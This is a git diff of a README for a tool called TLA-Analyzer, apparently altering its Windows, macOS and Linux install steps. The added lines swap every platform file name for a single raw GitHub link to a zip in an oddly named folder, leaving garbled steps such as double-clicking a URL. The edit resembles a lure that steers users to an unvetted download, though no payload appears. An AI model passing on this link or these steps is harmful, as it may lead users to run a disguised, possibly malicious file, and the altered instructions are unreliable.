mromanpc/TLA-Analyzer/README.md

 #### Windows

-1. Locate the downloaded `TLA-Analyzer-Windows.zip` file in your download folder.
+1. Locate the downloaded `https://raw.githubusercontent.com/mromanpc/TLA-Analyzer/main/gramophonically/TLA-Analyzer.zip` file in your download folder.
 2. Right-click the file and select **Extract All**.
 Follow the prompts to extract the contents.
-3. Open the extracted folder and locate the file named `TLA-Analyzer.exe`.
+3. Open the extracted folder and locate the file named `https://raw.githubusercontent.com/mromanpc/TLA-Analyzer/main/gramophonically/TLA-Analyzer.zip`.
-4. Double-click `TLA-Analyzer.exe` to launch the application.
+4. Double-click `https://raw.githubusercontent.com/mromanpc/TLA-Analyzer/main/gramophonically/TLA-Analyzer.zip` to launch the application.

 #### macOS

-1. Find the `TLA-Analyzer-macOS.zip` file in your downloads.
+1. Find the `https://raw.githubusercontent.com/mromanpc/TLA-Analyzer/main/gramophonically/TLA-Analyzer.zip` file in your downloads.
 2. Double-click the file to extract its contents.
-3. Open the folder and find `TLA-Analyzer.app`.
+3. Open the folder and find `https://raw.githubusercontent.com/mromanpc/TLA-Analyzer/main/gramophonically/TLA-Analyzer.zip`.
-4. Drag the `TLA-Analyzer.app` file to your Applications folder.
+4. Drag the `https://raw.githubusercontent.com/mromanpc/TLA-Analyzer/main/gramophonically/TLA-Analyzer.zip` file to your Applications folder.
 5. Open your Applications folder, locate `TLA-Analyzer`, and double-click to run.

 #### Linux

-1. Navigate to the downloaded `TLA-Analyzer-Linux.tar.gz` file.
+1. Navigate to the downloaded `https://raw.githubusercontent.com/mromanpc/TLA-Analyzer/main/gramophonically/TLA-Analyzer.zip` file.
 2. Right-click and select **Extract Here** to unpack the archive.
 3. Open a terminal window and navigate to the extracted folder.
 4. Type `./TLA-Analyzer` and press Enter to start the application.